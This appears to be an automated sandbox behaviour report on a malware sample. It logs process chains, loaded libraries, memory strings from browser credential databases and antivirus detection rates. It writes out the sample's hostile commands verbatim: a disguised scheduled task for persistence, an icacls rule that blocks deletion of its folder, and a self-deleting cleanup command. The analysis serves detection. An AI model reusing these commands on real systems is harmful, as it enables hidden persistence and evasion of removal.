Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build2.exe, 00000013.00000003.2340668890.0000000000909000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe Virustotal: Detection: 43%
Source: E609.exe String found in binary or memory: set-addPolicy
Source: E609.exe String found in binary or memory: id-cmc-addExtensions
Source: E609.exe String found in binary or memory: set-addPolicy
Source: E609.exe String found in binary or memory: id-cmc-addExtensions
Source: E609.exe String found in binary or memory: set-addPolicy
Source: E609.exe String found in binary or memory: id-cmc-addExtensions
Source: E609.exe String found in binary or memory: id-cmc-addExtensions
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\rujtcgu C:\Users\user\AppData\Roaming\rujtcgu
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C01.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: unknown Process created: C:\Users\user\AppData\Roaming\rujtcgu C:\Users\user\AppData\Roaming\rujtcgu
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876
Source: unknown Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" " Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: browcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: iphlpapi.dll
